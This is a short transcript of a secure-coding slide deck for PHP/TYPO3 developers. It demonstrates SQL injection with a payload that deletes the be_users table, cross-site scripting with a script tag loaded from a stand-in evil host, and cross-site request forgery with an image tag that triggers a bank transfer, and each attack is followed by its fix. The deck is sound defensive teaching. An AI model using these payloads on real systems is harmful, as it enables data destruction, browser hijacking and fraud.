Writing secure code

Writing secure code by Dmitry Dulepov

Security is the issue

You are responsible

You must not fail

Write secure code now!

3 attacks

SQL injection: how

SQL injection: how index.php?id=1

SQL injection: how index.php?id=1 “SELECT * FROM pages WHERE ” . “id=’” . $_GET[‘id’] . “‘“

SQL injection: how index.php?id=1 “SELECT * FROM pages WHERE ” . “id=’” . $_GET[‘id’] . “‘“ index.php?id=1’;DELETE FROM be_users’

SQL injection: how index.php?id=1 “SELECT * FROM pages WHERE ” . “id=’” . $_GET[‘id’] . “‘“ index.php?id=1’;DELETE FROM be_users’ “SELECT * FROM pages WHERE ” . “id=’1‘;DELETE FROM be_users ‘’“

SQL injection: the ﬁx

SQL injection: the ﬁx “SELECT * FROM pages WHERE ” . “id=” . $GLOBALS[‘TYPO3’]-> fullQuoteStr($id, ‘pages’)

SQL injection: the ﬁx “SELECT * FROM pages WHERE ” . “id=” . $GLOBALS[‘TYPO3’]-> fullQuoteStr($id, ‘pages’) “SELECT * FROM pages WHERE ” . “id=” . intval($id)

Cross–site scripting: how

Cross–site scripting: how Comment: I agree! <script src=”http://example.com/ evil-script.js”> </script> Submit

Cross–site scripting: the x

Cross–site scripting: the x htmlspecialchars($comment)

Cross–site request forgery: how

Cross–site request forgery: how <img src=”http://yourbank.com/ transfer? to_account=DE25LALA1234567890& amount=4000& currency=EUR” />

Cross–site request forgery: the x

Cross–site request forgery: the x • _POST • random number

Cross–site request forgery: the x • _POST • random number • Salted magic value • Captcha

Remember about security

Make customers happy!

http://underpop.free.fr	27
http://www.slideshare.net	7
http://underpop.online.fr	3

Writing secure code

by Dmitry Dulepov

Accessibility

Categories

Upload Details

Usage Rights

3 Embeds 37

Statistics

Writing secure code Presentation Transcript